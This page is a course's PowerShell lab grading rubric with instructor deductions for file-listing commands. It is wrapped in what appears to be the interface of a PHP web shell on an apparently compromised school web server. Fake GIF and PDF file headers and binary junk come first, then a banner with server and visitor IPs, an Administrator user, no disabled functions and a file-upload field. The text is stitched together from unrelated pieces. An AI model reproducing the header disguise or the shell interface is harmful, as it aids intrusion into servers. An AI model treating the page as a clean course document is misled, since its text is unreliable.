GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1861/Labs/ |
Upload File : |
Grading Criteria Demonstrated assignment effectively: 10 points. There are some things I expect. If they are incorrect you will lose the following: Work submitted incorrectly: -1 pt. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc. Second and subsequent submission of work for grading: -1 pt. Work submitted late: -1 pt per week. I reserve the right not to apply the deduction points at my absolute discretion. Get-Childern file1.* | ForEach-Objext { $_.Name, (Get-Content $_ -Raw) --or-- ls *.html *.json *.txt | select name, (cat $_) -2 Your command does not limit the files to file1.htms, file1.json, and file1.txt. -5 Step 5; Your command does not display the file name and then its content. It only shows the file content. =e -5 Step 6; Your screenshot does not show the complete command. =e -0 I do not understand the use of @' {0} {1} 1@. You should only need $_.Name, (Get-Content $_ -Raw)